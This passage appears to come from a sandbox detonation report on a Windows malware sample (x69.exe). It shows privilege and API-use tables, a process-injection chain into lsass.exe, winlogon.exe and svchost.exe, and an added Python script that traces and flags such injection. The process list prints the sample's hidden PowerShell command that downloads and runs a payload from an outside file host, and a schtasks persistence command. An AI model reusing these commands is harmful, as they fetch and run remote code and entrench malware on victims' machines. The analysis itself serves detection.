Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 380 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 380 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1700 wrote to memory of 5688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\MasonKit.com
PID 1700 wrote to memory of 5688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\MasonKit.com
PID 380 wrote to memory of 5296 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\schtasks.exe
PID 380 wrote to memory of 5296 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\schtasks.exe
PID 5688 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\MasonKit.com C:\Users\Admin\AppData\Local\Temp\MasonR.bat
PID 5688 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\MasonKit.com C:\Users\Admin\AppData\Local\Temp\MasonR.bat
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 4812 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 4812 wrote to memory of 668 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 4812 wrote to memory of 948 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 376 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 4812 wrote to memory of 540 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1028 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1100 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1140 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1160 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1240 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1248 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 668 wrote to memory of 2868 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4812 wrote to memory of 1324 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1468 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1584 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1608 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1640 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1728 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1744 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1832 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1968 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1988 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2020 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1596 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2068 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2084 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2164 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 4812 wrote to memory of 2320 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2328 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2548 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sihost.exe
PID 4812 wrote to memory of 2580 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2592 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2604 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2756 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2788 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2804 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskhostw.exe
PID 4812 wrote to memory of 2852 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2868 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 4812 wrote to memory of 2888 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2896 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 3124 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\unsecapp.exe
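The table above is the core of this detonation: a chain that starts at the sample in %TEMP%, passes through powershell.exe, MasonKit.com and MasonR.bat, and ends with dllhost.exe writing into winlogon.exe, lsass.exe, dwm.exe, spoolsv.exe, sysmon.exe and dozens of svchost.exe instances. The script below is an added example for this report, not sandbox or vendor code. It parses rows in the format printed here (a subset copied from this table, one duplicate kept to show de-duplication), rebuilds the "who wrote into whom" graph, and flags every write into a sensitive system process whose chain traces back to a user-writable directory. The SENSITIVE_TARGETS and USER_WRITABLE lists are the author's assumptions, not values taken from the report.

```python
"""Rebuild the cross-process write chain from a sandbox WriteProcessMemory table
and flag writes into system processes whose chain starts in a user-writable dir.
Added example, not sandbox or vendor code. ROWS is a subset of the table above
(one duplicate kept on purpose); SENSITIVE_TARGETS / USER_WRITABLE are assumptions."""
import re
from collections import defaultdict

ROWS = r"""
PID 380 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 380 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1700 wrote to memory of 5688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\MasonKit.com
PID 380 wrote to memory of 5296 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\schtasks.exe
PID 5688 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\MasonKit.com C:\Users\Admin\AppData\Local\Temp\MasonR.bat
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 4812 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 4812 wrote to memory of 668 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 4812 wrote to memory of 948 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 376 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 668 wrote to memory of 2868 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4812 wrote to memory of 2164 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 4812 wrote to memory of 2868 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
"""
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")
# Processes a dropper has no business writing into (assumption).
SENSITIVE_TARGETS = {"winlogon.exe", "lsass.exe", "svchost.exe", "dwm.exe", "spoolsv.exe", "sysmon.exe"}
# Path fragments that mark a user-writable staging location (assumption).
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def in_user_dir(path):
    return any(frag in path.lower() for frag in USER_WRITABLE)


def parse_rows(text):
    """Return unique (src_pid, dst_pid, src_image, dst_image) tuples in report order."""
    events, seen = [], set()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        ev = (int(m[1]), int(m[2]), m[3], m[4])
        if ev not in seen:
            seen.add(ev)
            events.append(ev)
    return events


def build_graph(events):
    """writers[dst] = pids that wrote into dst; images[pid] = image path."""
    writers, images = defaultdict(set), {}
    for src, dst, src_img, dst_img in events:
        writers[dst].add(src)
        images[src], images[dst] = src_img, dst_img
    return writers, images


def trace_origin(writers, pid):
    """Walk 'who wrote into me' edges back to the first writer; root comes first."""
    chain, seen, cur = [pid], {pid}, pid
    while writers.get(cur):
        candidates = [p for p in writers[cur] if p not in seen]
        if not candidates:
            break
        cur = min(candidates)  # deterministic pick when several writers exist
        seen.add(cur)
        chain.append(cur)
    return chain[::-1]


def fanout(events):
    """Distinct targets per writer; a large number is the 'inject into everything' pattern."""
    targets = defaultdict(set)
    for src, dst, _, _ in events:
        targets[src].add(dst)
    return {pid: len(t) for pid, t in targets.items()}


def flag_system_injection(events):
    """Writes into a sensitive process whose write chain starts in a user-writable dir."""
    writers, images = build_graph(events)
    findings = []
    for src, dst, src_img, dst_img in events:
        if basename(dst_img) not in SENSITIVE_TARGETS:
            continue
        chain = trace_origin(writers, src)
        if in_user_dir(images[chain[0]]):
            findings.append({"target": basename(dst_img), "target_pid": dst,
                             "injector": basename(src_img), "injector_pid": src,
                             "chain": [basename(images[p]) for p in chain]})
    return findings


if __name__ == "__main__":
    evs = parse_rows(ROWS)
    for f in flag_system_injection(evs):
        print(f"{' -> '.join(f['chain'])} => {f['target']} (pid {f['target_pid']})")
    print("fan-out per writer:", fanout(evs))
```

Two points worth checking on the real table rather than the subset: the write from lsass.exe (PID 668) into sysmon.exe (PID 2868) is itself a consequence of the earlier write into lsass.exe, which is why the chain is traced through writers rather than through parent PIDs; and the fan-out for PID 4812 in the full table is far higher than in the subset, which on its own separates this behaviour from a legitimate COM surrogate.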

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\x69.exe

"C:\Users\Admin\AppData\Local\Temp\x69.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EP Bypass -W Hidden -C "iwr 'https://files.catbox.moe/8ruqew.rar' -OutFile $env:TEMP\MasonKit.com; Start-Process -WindowStyle Hidden $env:TEMP\MasonKit.com"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\MasonKit.com

"C:\Users\Admin\AppData\Local\Temp\MasonKit.com"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"

C:\Users\Admin\AppData\Local\Temp\MasonR.bat

"C:\Users\Admin\AppData\Local\Temp\MasonR.bat"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{742a7f0f-e5c2-4a52-b3bb-c750adbe5391}

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe ccca352727b8f4cbe855cf200336a615 Qni2/g22ikaKUxCH80CEMA.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
